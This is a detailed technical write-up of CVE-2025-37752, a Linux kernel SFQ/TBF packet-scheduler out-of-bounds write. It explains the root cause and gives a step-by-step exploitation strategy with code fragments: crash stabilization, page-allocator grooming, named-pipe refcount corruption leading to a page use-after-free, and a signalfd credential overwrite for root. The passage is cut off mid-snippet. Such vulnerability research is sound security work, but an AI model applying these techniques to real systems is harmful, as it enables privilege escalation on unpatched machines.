[CVE-2025-37752] Two Bytes Of Madness: Pwning The Linux Kernel With A 0x0000 Written 262636 Bytes Out-Of-Bounds
D3vil
CVE-2025-37752 is an Array-Out-Of-Bounds vulnerability in the Linux network packet scheduler, specifically in the SFQ queuing discipline. An invalid SFQ limit and a series of interactions between SFQ and the TBF Qdisc can lead to a 0x0000 being written approximately 256KB out of bounds at a misaligned offset. If properly exploited, this can enable privilege escalation.
Overview
SFQ is a classless queueing discipline designed to ensure fair bandwidth distribution among various network data flows.
When utilized as a child of a TBF Qdisc, if the SFQ limit is set to one, a series of interactions between the two Qdiscs may lead to an underflow in the sfq_dec() function when the slot qlen is decremented from zero. This can result in a 16-bit value being written approximately 256KB out of bounds when the underflowed qlen is used as an index into the dep array of sfq_sched_data in sfq_link().
The original crash was triggered by Syzkaller and addressed by Google. However, the initial patch could still be bypassed, allowing the limit to be indirectly set to one. The bug has been fixed by commits 8c0cea59d40cf6dd13c2950437631dd614fbade6 and b3bf8f63e6179076b57c9de660c9f80b5abefe70. The first commit created a temporary area to process the Qdisc parameters, while the second moved the limit check to the end of the function. All kernel versions prior to these commits that have CONFIG_NET_SCH_SFQ and CONFIG_USER_NS enabled are affected.
In this article, after analyzing the vulnerability, we will explore how I went from “This is just a DOS” to “This is impossible to exploit” to ultimately causing a page-UAF that allowed me to compromise all of Google’s kernelCTF instances with the same binary.
TL;DR
Spray sfq_slots in kmalloc-64 to prevent an immediate kernel crash when the bug is triggered.
Prevent a type-confused skb from being dequeued by reconfiguring the TBF Qdisc. Drop TBF rate and add packet overhead before the OOB write occurs.
Use the 0x0000 written 262636 bytes OOB to corrupt the pipe->files field of a named pipe, free the pipe, cause page-level UAF and get arbitrary R/W in that page.
Reclaim the freed page with signalfd files and use the page-level R/W primitive to swap file->private_data with file->f_cred.
Get root by overwriting the process credentials with zeros via signalfd4().
Vulnerability Analysis
When a SFQ Qdisc is initialized, sfq_change() is called. Despite an initial check explicitly prohibiting a limit equal to one, the Qdisc limit can still be indirectly set to this value when other Qdisc parameters are updated:
static int sfq_change(struct Qdisc *sch, struct nlattr *opt,
                      struct netlink_ext_ack *extack)
{
    // ...
    // Initial check prohibiting limit == 1
    if (ctl->limit == 1) {
        NL_SET_ERR_MSG_MOD(extack, "invalid limit");
        return -EINVAL;
    }
    // ...
    if (ctl->flows)
        q->maxflows = min_t(u32, ctl->flows, SFQ_MAX_FLOWS);
    if (ctl->divisor) {
        q->divisor = ctl->divisor;
        q->maxflows = min_t(u32, q->maxflows, q->divisor);
    }
    if (ctl_v1) {
        if (ctl_v1->depth)
            q->maxdepth = min_t(u32, ctl_v1->depth, SFQ_MAX_DEPTH);
        // ...
    }
    if (ctl->limit) {
        // Here, if q->maxdepth = 1 and q->maxflows = 1,
        // the ctl->limit == 1 check above can be bypassed and q->limit set to 1
        q->limit = min_t(u32, ctl->limit, q->maxdepth * q->maxflows);
        q->maxflows = min_t(u32, q->maxflows, q->limit);
    }
    // ...
}
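The bypass boils down to the min_t() clamping above. A minimal sketch in Python (the concrete ctl->limit value 0x2000 is just an illustrative input, any value other than one passes the initial check):

```python
# Emulate the q->limit clamping in sfq_change() when depth = flows = 1
def min_t(a, b):
    return min(a, b)

maxdepth = 1        # ctl_v1->depth = 1
maxflows = 1        # ctl->flows = 1
ctl_limit = 0x2000  # any value != 1 passes the initial check

limit = min_t(ctl_limit, maxdepth * maxflows)
maxflows = min_t(maxflows, limit)
print(limit)  # 1 -> the "ctl->limit == 1" check has been bypassed
```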
q->limit determines the maximum number of packets in the Qdisc queue. In sfq_enqueue(), when a new packet arrives, if the Qdisc queue length (aka qlen) exceeds this limit, the packet is dropped.
If q->limit is set to one and packets are sent to the network interface in a burst, a complex chain of interactions between TBF and SFQ can lead to multiple bugs, including an array out-of-bounds write vulnerability.
Let’s explore step by step what happens if we send three packets in a burst to a network interface configured with TBF as the root Qdisc and SFQ, with its limit forced to one, as its child.
Packet A is sent (skb_A)
tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, and the SFQ qlen is incremented to 1:
tbf_enqueue()
  qdisc_enqueue()
    sfq_enqueue()                   // SFQ qlen is 0
      slot = q->slots[0]
      slot_queue_add()
        slot->skblist_next = skb_A
        slot->skblist_prev = skb_A
      q->tail = slot
      ++sch->q.qlen                 // SFQ qlen = 1
      // SFQ qlen <= limit, skb_A is enqueued
tbf_dequeue() is called. Since the sch->gso_skb list is empty, sfq_dequeue() is invoked, and the packet is correctly dequeued. SFQ qlen is decremented to 0. So far so good:
tbf_dequeue()
  qdisc_peek_dequeued()
    skb_peek(&sch->gso_skb)         // sch->gso_skb is empty
    sfq_dequeue()                   // SFQ qlen is 1
      slot = q->tail
      slot_dequeue_head()
        skb_A = slot->skblist_next
        slot->skblist_next = slot
        slot->skblist_prev = slot
      sch->q.qlen--                 // SFQ qlen = 0
    __skb_queue_head(&sch->gso_skb, skb)
    sch->q.qlen++                   // SFQ qlen = 1
  // TBF has enough tokens, so the packet can be dequeued
  qdisc_dequeue_peeked()
    skb_A = __skb_dequeue(&sch->gso_skb)
    sch->q.qlen--                   // SFQ qlen = 0
Packet B is sent (skb_B)
tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:
tbf_enqueue()
  qdisc_enqueue()
    sfq_enqueue()                   // SFQ qlen is 0
      slot = q->slots[0]
      slot_queue_add()
        slot->skblist_next = skb_B
        slot->skblist_prev = skb_B
      q->tail = slot
      ++sch->q.qlen                 // SFQ qlen = 1
      // SFQ qlen <= limit, skb_B is enqueued
tbf_dequeue() is called, which in turn calls sfq_dequeue(). The packet is correctly dequeued from SFQ, but TBF ran out of tokens, so it reschedules itself for later using qdisc_watchdog_schedule_ns(). The SFQ qlen remains 1, as packet B is still considered to be in the queue (it is actually in the gso_skb list):
tbf_dequeue()
  qdisc_peek_dequeued()
    skb_peek(&sch->gso_skb)         // sch->gso_skb is empty
    sfq_dequeue()                   // SFQ qlen is 1
      slot = q->tail
      slot_dequeue_head()
        skb_B = slot->skblist_next
        slot->skblist_next = slot
        slot->skblist_prev = slot
      sch->q.qlen--                 // SFQ qlen = 0
    __skb_queue_head(&sch->gso_skb, skb)
    sch->q.qlen++                   // SFQ qlen = 1
  // TBF runs out of tokens, reschedules itself for later
  qdisc_watchdog_schedule_ns()
Packet C is sent (skb_C)
tbf_enqueue() is called, which in turn calls sfq_enqueue(). Packet C is added to the first SFQ slot, q->tail is set to slot, and the SFQ qlen is incremented from 1 (packet B is still enqueued!) to 2. However, since qlen is now greater than q->limit, the packet is dropped.
sfq_drop() uses slot_dequeue_tail() to remove the packet from the slot. Now the slot->skblist_next and slot->skblist_prev fields point to the slot itself. Finally, the SFQ qlen is decremented to 1.
Notice how q->tail is not NULL at this point: it still corresponds to slot, but now slot->skblist_next and slot->skblist_prev point to the slot itself rather than to a valid sk_buff.
tbf_dequeue() attempts to dequeue packet B from the sch->gso_skb list, but it is still out of tokens, so it reschedules itself once again:
tbf_dequeue()
  qdisc_peek_dequeued()
    skb_peek(&sch->gso_skb)         // sch->gso_skb is _not_ empty (contains packet B)
  // TBF is still out of tokens, reschedules itself for later
  qdisc_watchdog_schedule_ns()
The first qdisc-watchdog timer fires
Approximately 1 second later (the time depends on the TBF configuration), the Qdisc watchdog timer fires, and tbf_dequeue() is called again. Packet B is removed from the sch->gso_skb list and correctly dequeued. The SFQ qlen is decremented to 0:
tbf_dequeue()
  qdisc_peek_dequeued()
    skb_peek(&sch->gso_skb)         // sch->gso_skb is NOT empty
  qdisc_dequeue_peeked()
    skb_B = __skb_dequeue(&sch->gso_skb)  // remove the packet from sch->gso_skb
    sch->q.qlen--                   // SFQ qlen = 0
The second qdisc-watchdog timer fires (and things go bad)
The second Qdisc watchdog timer fires, now the sch->gso_skb list is empty, so sfq_dequeue() is called. However, since q->tail is not NULL, slot_dequeue_head() is used to dequeue the skb. The issue arises because slot_dequeue_tail() in sfq_drop() set slot->skblist_next and slot->skblist_prev to the address of the slot itself, so a type confusion bug between a sk_buff and a sfq_slot occurs.
sfq_dec() is then called and the SFQ slot qlen is decremented from zero, resulting in an underflow. The underflowed qlen is subsequently used as an index in the q->dep array (q here is a sfq_sched_data structure), and this is where the out-of-bounds write occurs:
tbf_dequeue()
  qdisc_peek_dequeued()
    skb_peek(&sch->gso_skb)         // sch->gso_skb is empty
    sfq_dequeue()                   // SFQ qlen = 0
      slot = q->tail
      slot_dequeue_head()
        skb = slot->skblist_next    // but slot->skblist_next = slot, TYPE CONFUSION!
      sfq_dec()
        q->slots[0].qlen--          // SFQ qlen = 0xFFFF, UNDERFLOW!
        sfq_link()
          qlen = slot->qlen         // 0xFFFF
          ...
          q->dep[qlen].next = 0     // 0x0000 written OOB!
  // TBF runs out of tokens, reschedules itself for later
  qdisc_watchdog_schedule_ns()
Interestingly, FizzBuzz101 and I recently discovered a bug that allowed us to crash five different Qdiscs. Initially, we thought the root cause was different, but thanks to the kernel developer Cong Wang, we conducted further analysis and realized it was due to an interaction between the Qdiscs and TBF, very similar to the case described above! The discussion can be found here.
In-Depth Analysis (GDB Time)
Using GDB, we can inspect what happens when the Qdisc watchdog timer fires for the second time and the series of bugs is triggered. By setting a breakpoint at sfq_dequeue(), we can clearly see that after calling slot_dequeue_head(), the returned skb address and the sfq_slot address are the same. A type confusion occurred:
static struct sk_buff *sfq_dequeue(struct Qdisc *sch)
{
    // ...
    a = q->tail->next;             // a = 0
    slot = &q->slots[a];           // first (and only) slot retrieved
    // ...
    skb = slot_dequeue_head(slot); // Type confusion, skb is a sfq_slot!
    sfq_dec(q, a);                 // OOB write
    // ...
}

static inline struct sk_buff *slot_dequeue_head(struct sfq_slot *slot)
{
    struct sk_buff *skb = slot->skblist_next; // slot->skblist_next == slot, so skb = slot

    slot->skblist_next = skb->next;
    skb->next->prev = (struct sk_buff *)slot;
    skb->next = skb->prev = NULL;
    return skb;
}
If we step into the sfq_dec() function, we can observe how the slot qlen is decremented from 0, causing an underflow (qlen is a u16, so it will become 0xFFFF):
Finally, by stepping into sfq_link(), we can see how the qlen value, now 0xFFFF, is used as an index into the dep array of sfq_sched_data.
Since this array can hold a maximum of SFQ_MAX_DEPTH + 1 (127 + 1) entries, each 16 bytes in size, the index 0xFFFF will cause an out-of-bounds write.
We know the address of sfq_sched_data and the offset of the Qdisc private data (where sfq_sched_data lives) within the Qdisc structure (0x180 bytes). From this we can derive the address of the current Qdisc object.
Using GDB we can also determine where the 0x0000 is written out of bounds. By subtracting the current object address from this value, we can obtain the distance between the Qdisc object and the victim address:
sfq_sched_data_addr = 0xffff88802e537980
oob_write_addr = 0xffff88802e5779ec
privdata_offset_in_qdisc = 0x180  # sfq_sched_data offset in Qdisc

qdisc_addr = sfq_sched_data_addr - privdata_offset_in_qdisc
distance = oob_write_addr - qdisc_addr
print(hex(distance))  # 0x401ec, or 262636 bytes
So we have a 0x0000 written only 262636 bytes after the vulnerable Qdisc object. Things are getting interesting.
This Is Not Exploitable…
At this point, I honestly thought this was impossible to exploit. I also showed the bug and provided a quick explanation to FizzBuzz101, and he agreed. The 256KB+ out-of-bounds write primitive at a misaligned offset (0x1EC) seemed extremely limited, and as if that weren’t enough, the kernel was crashing right after sfq_dec() due to an invalid pointer access. However, I decided to persist and continued with further investigation.
We need to keep in mind that due to the sk_buff/sfq_slot type confusion, the skb returned by slot_dequeue_head() in sfq_dequeue() is not actually a sk_buff, but rather a sfq_slot.
Dr. Evil attempting to explain to his crew that the skb is not really an skb
This means that every access to this "skb" translates to an access to a sfq_slot, which can potentially lead to a crash. For instance, the kernel will immediately panic right after the out-of-bounds write in sfq_dec(), due to an invalid pointer access in qdisc_bstats_update(sch, skb):
static struct sk_buff *sfq_dequeue(struct Qdisc *sch)
{
    // ...
    skb = slot_dequeue_head(slot); // Type confusion, skb is a sfq_slot
    sfq_dec(q, a);                 // OOB write!
    qdisc_bstats_update(sch, skb); // Kernel panic! :(
    // ...
}
But this is not the only problem we need to address if we want to exploit the vulnerability. If the "skb" is dequeued from both SFQ and TBF, it will inevitably lead to a crash when it is processed further.
Stabilization: Addressing The First Kernel Panic In qdisc_bstats_update()
The first kernel crash occurs in qdisc_bstats_update(), right after the sfq_dec() call. qdisc_bstats_update() calls skb_is_gso(), which utilizes the skb_shinfo() macro, which in turn uses skb_end_pointer(). This relies on the skb->head pointer and skb->end of the sk_buff to determine where the packet data ends and the actual skb_shared_info begins.
Now, offsetof(struct sk_buff, head) = 192, but in our case, the "skb" is actually a sfq_slot, which is allocated in kmalloc-64. Therefore, an access to skb->head at offset 192 translates to an access to the first qword of another object in kmalloc-64, specifically, the first qword of the third object after the "skb". If this qword does not contain a valid pointer, the kernel crashes when the pointer is dereferenced to access ->gso_size.
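A quick back-of-the-envelope check (a sketch, assuming the kmalloc-64 objects sit back to back in the slab) shows which neighbor the fake skb->head access lands on:

```python
SLOT_SIZE = 64   # a sfq_slot lives in kmalloc-64
HEAD_OFF = 192   # offsetof(struct sk_buff, head)

# Object index (relative to the type-confused slot) and offset within it
print(HEAD_OFF // SLOT_SIZE, HEAD_OFF % SLOT_SIZE)  # 3 0
```

In other words, the skb->head read hits the first qword (offset 0) of the third kmalloc-64 object after the "skb".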
The slots array is allocated by sfq_init() using sfq_alloc(), a kvmalloc wrapper. Each sfq_slot is 64 bytes in size and the number of slots in the array depends on q->maxflows. Our SFQ configuration only has a single flow, which results in a single slot allocated in kmalloc-64 per Qdisc.
If we want to prevent the kernel from crashing, we need to populate the kmalloc-64 slab with objects that have a valid pointer as their first qword.
Luckily, we don’t need to look too far. When a sfq_slot is initialized, the first and second qwords are set to its own address, so we can fake a valid skb->head pointer by spraying sfq_slot(s) in kmalloc-64.
The offset 192, relative to the type-confused sfq_slot, will correspond to the slot->skblist_next pointer of the third slot after the current one.
This was an easy win. Now let’s address the second kernel panic when the "skb" is dequeued from both SFQ and TBF.
Stabilization: Addressing The Second Kernel Panic In validate_xmit_skb()
After the type confusion and the out-of-bounds write, sfq_dequeue() will return the type-confused "skb" in tbf_dequeue() which in turn will return it in dequeue_skb(). This function will pass the dequeued "skb" to sch_direct_xmit(), which will call validate_xmit_skb_list(). This will lead to a call to validate_xmit_skb(), where the kernel will crash due to another invalid pointer access:
Now, I won’t dig too much into it, but having a sk_buff type confused with a sfq_slot wandering around the kernel is not a good idea. Therefore, instead of trying to fake pointers in kmalloc-64 as we did to address the previous crash, we want to tackle the root cause and prevent the packet from being dequeued.
I could not find a way to prevent SFQ from dequeuing the "skb", so I decided to focus on TBF. Here is the tbf_dequeue() function:
static struct sk_buff *tbf_dequeue(struct Qdisc *sch)
{
    struct tbf_sched_data *q = qdisc_priv(sch);
    struct sk_buff *skb;

    skb = q->qdisc->ops->peek(q->qdisc); // "skb" returned by sfq_dequeue()

    if (skb) {
        s64 now;
        s64 toks;
        s64 ptoks = 0;
        unsigned int len = qdisc_pkt_len(skb); // [6]

        now = ktime_get_ns();
        toks = min_t(s64, now - q->t_c, q->buffer);
        // ...
        toks += q->tokens;                         // [4]
        if (toks > q->buffer)
            toks = q->buffer;                      // [5]
        toks -= (s64)psched_l2t_ns(&q->rate, len); // [3]

        // Here we need toks|ptoks to be < 0
        if ((toks | ptoks) >= 0) {                 // [1]
            skb = qdisc_dequeue_peeked(q->qdisc);
            if (unlikely(!skb))
                return NULL;
            // ...
            return skb;
        }
        qdisc_watchdog_schedule_ns(&q->watchdog,
                                   now + max_t(long, -toks, -ptoks)); // [2]
        qdisc_qstats_overlimit(sch);
    }
    return NULL;
}
In tbf_dequeue(), if the amount of remaining tokens is greater than or equal to zero, the packet is dequeued [1]. Otherwise, the Qdisc reschedules itself for later using qdisc_watchdog_schedule_ns() [2]. In this case, the negated token count corresponds to the number of nanoseconds to wait before rescheduling.
To prevent the packet from being dequeued, we need to solve a min/max problem. We want to minimize toks and maximize the value returned by psched_l2t_ns(), so that when this value is subtracted from toks, we can obtain a negative number (the lower, the better). [3]
This approach looks promising, as we can indirectly minimize toks by controlling q->buffer and q->tokens in tbf_change() [4][5]. Additionally, we can (probably) maximize the "skb" packet length (keep in mind that our skb is a sfq_slot) [6] by controlling a sfq_slot field.
As we can see, offsetof(struct sk_buff, cb) = 40 and offsetof(struct qdisc_skb_cb, pkt_len) = 0. Now, our "skb" is a sfq_slot, and offset 40 (0x28 in hexadecimal) overlaps (in the Google kernelCTF LTS 6.6.8* instances) with sfq_slot->vars.qcount.
The slot->vars.qcount field is automatically set to -1 by red_set_vars() when a new packet is enqueued in sfq_enqueue(). So we are fortunate: when the type confusion occurs, this will result in a very large packet size, 0xFFFFFFFF.
However, our luck did not last very long. The memory alignment of the sfq_slot structure differs from system to system. In Google COS 105, and generally on systems before Linux 6.6.8*, the pkt_len field in skb->cb overlaps with slot->vars.qavg instead.
I could not find a way to reliably set qavg to a large number, and since one of my goals was to reuse the same binary to exploit all the Google kernelCTF instances, I needed to find a more generic solution.
Attempt 2: Reconfiguring The TBF Qdisc Before The Watchdog Timer Fires (SUCCESS)
Since we have direct control over q->tokens and q->buffer in tbf_change(), we could attempt to reconfigure the TBF Qdisc before the type-confused "skb" is dequeued, in other words, before the second watchdog timer fires.
We can minimize q->tokens and q->buffer by dropping the TBF rate via TCA_TBF_RATE64. Additionally, we can try to maximize the packet length by adding packet overhead. This value will be added to the real packet length (well, in our case it’s “real”…) in psched_l2t_ns().
struct tc_tbf_qopt opt = {
    .limit = 10000,
    .rate.overhead = 0xffff, // Add packet overhead
};

options = nlmsg_alloc();
nla_put(options, TCA_TBF_PARMS, sizeof(opt), &opt);
nla_put_u32(options, TCA_TBF_BURST, 99);
nla_put_u64(options, TCA_TBF_RATE64, 1); // Drop the rate limit
nla_put_nested(msg, TCA_OPTIONS, options);
With the new configuration, when the type-confused "skb" is dequeued, TBF will run out of tokens and reschedule itself again, this time for 18 hours later. Here is a summary of what happens:
sfq_dequeue() -> OOB write is triggered -> The type-confused "skb" is returned in tbf_dequeue() -> tbf_dequeue() is out of tokens -> reschedules itself for 18 hours later
65512964729825 nanoseconds correspond to approximately 65512 seconds, or about 18 hours, a time window that should be large enough to complete the exploitation process…
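As a sanity check on that number (plain unit conversion, nothing kernel-specific):

```python
delay_ns = 65512964729825        # delay passed to qdisc_watchdog_schedule_ns()
delay_s = delay_ns / 1e9
print(round(delay_s))            # ~65513 seconds
print(round(delay_s / 3600, 1))  # ~18.2 hours
```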
Two Bytes Of Madness
We finally managed to stabilize the bug and can trigger the vulnerability without crashing the kernel. But now… how do we exploit it? A 0x0000 written 256KB+ out of bounds to an unknown memory location is not very useful.
A first step could consist of thinking about our 262636 bytes (or 0x401EC in hexadecimal) out-of-bounds write primitive, as 0x40000 + 0x1EC, in other words a jump of 256KB plus some misaligned offset within a 4KB page. This would allow us to split the problem in two parts:
We need to find an object with a field that, once corrupted, can provide us with some useful exploitation primitives. This field must be at a specific offset within a page (Refcount -> UAF?)
We need to control large portions of kernel memory to maximize the probability of making the 0x0000 land in the designated victim object and not elsewhere
Finding The Victim Object
The SFQ Qdisc (struct Qdisc + struct sfq_sched_data) is allocated in kmalloc-2k. We know that in kmalloc-2k each object is 2048 bytes in size. Thus, each 4KB page can contain two of these objects.
If we try to make the 0x0000 land in a 4KB page containing two other kmalloc-2k objects, the u16 value can be written at two different offsets: 0x1EC or 0x9EC, depending on the offset in the page of the attacking SFQ Qdisc object (+0x00 or +0x800).
Let’s consider another example, this time utilizing kmalloc-256 as the target cache. This cache requires one order 0 page (4KB) and can contain 16 objects, each 256 bytes in size. If the attacking SFQ Qdisc object is allocated at offset +0x00 in its page, the 0x0000 will corrupt the second object in kmalloc-256, specifically the field at offset 236 within it. If the attacking object is allocated at offset +0x800 instead, the tenth object will be corrupted, even in this case, at offset 236.
What about misaligned caches, for example kmalloc-192? If the attacking SFQ Qdisc object is allocated at offset +0x00 in the 4KB page, the 0x0000 will corrupt the third object in the target slab, specifically, the field at offset 108 within it. If the offset of the attacking object is +0x800, the fourteenth object will be corrupted, this time the field at offset 44.
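The (object, offset) arithmetic above can be reproduced with a short helper (a sketch that assumes each target slab starts exactly at a page boundary and is densely packed, with no slab metadata inside the page):

```python
DISTANCE = 0x401EC  # OOB write distance from the attacking Qdisc object
PAGE = 0x1000

def landing_spot(attacker_page_off, obj_size):
    """Return (1-based object index in the target page, offset in that object)."""
    in_page_off = (attacker_page_off + DISTANCE) % PAGE
    return in_page_off // obj_size + 1, in_page_off % obj_size

for size in (2048, 256, 192):
    for off in (0x0, 0x800):
        print(f"size={size} attacker@+{off:#x} ->", landing_spot(off, size))
```

For kmalloc-192, this yields (3, 108) and (14, 44), matching the two cases above.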
Here is a table containing, for every general-purpose cache and for two other caches (cred_jar and filp), the pair (object in the slab, offset in the object). If you manage to find another object that can be corrupted to achieve privilege escalation based on this data, please ping me, I would be very curious to hear about your strategy!
With this data in hand, I utilized libksp, a Python library I developed some time ago, to convert kernel structures into Python objects, allowing for various types of queries. For each cache, I searched for structures (and nested structures) with fields of 1, 2, and 4 bytes in size that could align with the offsets provided in the table above.
The tool returned a very large number of results (~1400 aligned fields, including false positives), but I could not find anything useful.
I was mainly looking for reference counters to set to zero so I could cause a UAF.
I was about to give up, but then I noticed something interesting…
I have already used pipes in multiple exploits, but I did not know how the files field was used, so I decided to dig into the pipe_inode_info structure.
With our out-of-bounds write primitive, we can overwrite pipe->files of the third pipe in the slab [2] if the attacking SFQ Qdisc object is allocated at offset +0x00 in the page, or the pipe->rd_wait[1] waitqueue of the fourteenth object in the slab if the attacking kmalloc-2k object offset is +0x800.
The pipe->files field is used as a reference counter to determine when a pipe_inode_info structure and all the related objects need to be released. The problem is that this field cannot be controlled by using pipe(), as it is always set to two for normal pipes.
Instead, we need to use named pipes created with mkfifo().
When a named pipe is opened, fifo_open() is called. If inode->i_pipe is not present, a new pipe_inode_info object is allocated by alloc_pipe_info() in kmalloc-cg-192 and pipe->files incremented. If inode->i_pipe is already present, then only pipe->files is incremented:
static int fifo_open(struct inode *inode, struct file *filp)
{
    struct pipe_inode_info *pipe;
    bool is_pipe = inode->i_sb->s_magic == PIPEFS_MAGIC;
    int ret;

    filp->f_version = 0;
    spin_lock(&inode->i_lock);
    if (inode->i_pipe) {
        // inode->i_pipe already present, increment the pipe->files counter
        pipe = inode->i_pipe;
        pipe->files++; // [1]
        spin_unlock(&inode->i_lock);
    } else {
        // inode->i_pipe is not present, allocate a new pipe_inode_info object
        spin_unlock(&inode->i_lock);
        pipe = alloc_pipe_info(); // [2]
        if (!pipe)
            return -ENOMEM;
        pipe->files = 1;
        // ...
        inode->i_pipe = pipe;
        // ...
    }
    filp->private_data = pipe;
    // ...
}

struct pipe_inode_info *alloc_pipe_info(void)
{
    // ...
    // sizeof(struct pipe_inode_info) = 168. GFP_KERNEL_ACCOUNT is set,
    // so it goes into kmalloc-cg-192
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    // ...
}
When the file descriptor of a named pipe is closed, put_pipe_info() is called, and if --pipe->files is 0, the pipe_inode_info structure and all the associated objects are released.
Pipe deallocation is performed by free_pipe_info(). This function starts iterating through all the pipe buffers, and releases them by calling pipe_buf_release(), which internally calls buff->ops->release() (anon_pipe_buf_release()).
The very interesting part is that upon release, free_pipe_info() also frees the pipe->tmp_page if present. In our case, this would cause a page-UAF, as we still have access to the freed pipe. This is a very powerful primitive!
It looks like we have finally found a valid victim object; now we need to find a way to reliably control the kernel memory layout.
Controlling The Kernel Memory Layout
We have identified our target object. We know it is allocated in kmalloc-cg-192 by alloc_pipe_info(), and we know that with our out-of-bounds write, assuming we can achieve good control over kernel memory, we have a 50% chance of overwriting pipe->files instead of pipe->rd_wait, triggering a page-UAF that can provide us with an R/W primitive in an arbitrary page of memory.
Now we need to control the kernel memory layout, as at this moment the memory surrounding the vulnerable Qdisc is completely outside our control.
What I did was start thinking about memory in logical blocks of 256KB each, with the goal of alternating a 256KB memory block containing attacking objects with one or more blocks containing victim objects.
The attacking object, a SFQ Qdisc (struct Qdisc + struct sfq_sched_data) is allocated in kmalloc-2k. According to /proc/slabinfo, a kmalloc-2k slab requires one order 3 page and can hold 16 objects, each 2KB in size.
Therefore, assuming we can access a contiguous portion of memory, if we logically partition the kernel memory into multiple blocks of 256KB each, we can populate a 256KB block with 8 order 3 pages (corresponding to 8 kmalloc-2k slabs) by allocating 128 kmalloc-2k objects in a row.
Then we proceed to fill the next 256KB block with 64 order 0 pages (corresponding to 64 kmalloc-cg-192 slabs). Each kmalloc-cg-192 slab holds 21 objects, each 192 bytes in size. This means that if we want to fill 256KB of memory, we need to allocate 1344 kmalloc-cg-192 objects.
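The slab and object counts follow from simple arithmetic (a sketch based on the /proc/slabinfo numbers quoted above):

```python
BLOCK = 256 * 1024  # one logical memory block
PAGE = 4096

order3_page = PAGE << 3                     # 32KB, backs one kmalloc-2k slab
slabs_2k = BLOCK // order3_page             # slabs per 256KB block
objs_2k = slabs_2k * (order3_page // 2048)  # 16 objects per slab
print(slabs_2k, objs_2k)                    # 8 128

slabs_192 = BLOCK // PAGE                   # one kmalloc-cg-192 slab per order 0 page
objs_192 = slabs_192 * (PAGE // 192)        # 21 objects per slab
print(slabs_192, objs_192)                  # 64 1344
```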
Please note that the memory layout described above can only be theoretically achieved. In reality, many variables cannot be controlled. For instance, we don’t know when a new slab is allocated (perhaps SLUBStick could help in this case?), we don’t know if other pages are being freed by other processes, which could disrupt our attempt to access a contiguous portion of memory, and so on. However, attempting to obtain this memory layout is a good starting point.
Now, the kernel page allocator organizes pages of different orders and migration types in different freelists. If we want to alternate between a 256KB block containing 8 order 3 pages (or 8 kmalloc-2k slabs) and a 256KB block containing 64 order 0 pages (or 64 kmalloc-cg-192 slabs), we first need to drain all the PCP lists for the unmovable migration type (kernel slabs are allocated using this migration type), and possibly all the buddy freelists for the same migration type, from order 0 up to order 3 or even higher.
This way, subsequent requests will force the buddy allocator to split higher order pages into lower order buddies. This will give us access to relatively large portions of contiguous memory. If you are not familiar with the Linux Buddy allocator, or just need a quick refresh, I recently condensed some of my notes in an article: A Quick Dive Into The Linux Page Allocator.
Our goal is to reach the following memory configuration (or at least something similar), with a block of 256KB containing 128 kmalloc-2k objects (8 order 3 pages) and the following 256KB block containing 1344 kmalloc-cg-192 objects (64 order 0 pages).
This memory layout can also be used to trigger the bug multiple times from different 256KB blocks, but in our exploit, we will use a single write.
Exploitation Strategy
To sum up: with the following strategy, we should be able to go from a 0x0000 written 256KB+ out of bounds to a page-UAF, and achieve arbitrary R/W in a page of memory:
Create many named pipes using mkfifo().
Drain unmovable pages from order 0 to 3.
Alternate between a 256KB block of memory containing SFQ Qdiscs and another block containing named pipes. At this stage, for all the pipes, pipe->files == 1.
Use the OOB write to set pipe->files of one of the pipes to 0. For all the pipes, pipe->files == 1, for the victim pipe, pipe->files == 0.
Reopen all the named pipes to increment pipe->files. For all the pipes, pipe->files == 2, for the victim pipe, pipe->files == 1.
Close all the named pipes, so pipe->files is decremented. For all the pipes, pipe->files == 1, for the victim pipe, pipe->files == 0.
free_pipe_info() is called, the victim pipe is released, and pipe->tmp_page is freed, causing a page-UAF as we still have control over this page through the named pipe file descriptor obtained during the pipe spray in the third step.
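From user space, the refcount dance in the steps above looks roughly like this (a minimal sketch on a single fifo at a hypothetical path; the kernel-side pipe->files transitions are of course only visible as comments, and on a healthy system nothing is freed early):

```python
import os
import tempfile

path = os.path.join(tempfile.mkdtemp(), "fifo")  # hypothetical path
os.mkfifo(path)

# Spray: the first open allocates pipe_inode_info, pipe->files = 1
fd_spray = os.open(path, os.O_RDWR | os.O_NONBLOCK)

# ... the OOB write would set the victim pipe's pipe->files to 0 here ...

# Reopen: fifo_open() only increments pipe->files (victim: 0 -> 1)
fd_reopen = os.open(path, os.O_RDWR | os.O_NONBLOCK)

# Close the reopened fd: put_pipe_info() decrements pipe->files;
# the victim pipe hits 0 and is freed while fd_spray is still open
os.close(fd_reopen)

# In the exploit, fd_spray now references the freed pipe -> page-UAF
os.close(fd_spray)
```

Note that opening a FIFO with O_RDWR is a Linux-specific behavior that avoids blocking for a peer.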
The pipe->tmp_page is allocated with the GFP_HIGHUSER flag, which the kernel documentation describes as follows:

"GFP_HIGHUSER means that the allocated memory is not movable, but it is not required to be directly accessible by the kernel. An example may be a hardware allocation that maps data directly into userspace but has no addressing limitations."

This indicates that the kernel is requesting an unmovable order 0 page. So when the page is freed, we can easily reclaim it with a slab allocated in an order 0 page with the same migration type.
We can use a filp slab, more precisely a filp slab containing signalfd files. Then, we can use pipe_read() and pipe_write() to swap the file->private_data pointer with file->f_cred, and use multiple writes to overwrite the process credentials with zeros, thanks to the zeroed most significant bytes of the signalfd_ctx sigmask written by do_signalfd4():
static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
    struct signalfd_ctx *ctx;
    // ...
    if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))
        return -EINVAL;

    sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));
    signotset(mask);

    if (ufd == -1) {
        struct file *file;

        ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);
        if (!ctx)
            return -ENOMEM;
        ctx->sigmask = *mask;
        // ...
        file = anon_inode_getfile("[signalfd]", &signalfd_fops, ctx,
                                  O_RDWR | (flags & O_NONBLOCK));
        // ...
    } else {
        // ...
        // We swapped file->private_data with file->f_cred,
        // so here ctx = file->f_cred
        ctx = fd_file(f)->private_data;
        // ...
        ctx->sigmask = *mask; // Overwrite f_cred
        // ...
    }
    return ufd;
}
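The reason the stored mask consists almost entirely of zero bytes can be verified with the mask transformations alone (a sketch assuming user space passes an all-ones sigmask):

```python
SIGKILL, SIGSTOP = 9, 19
U64 = 0xFFFFFFFFFFFFFFFF
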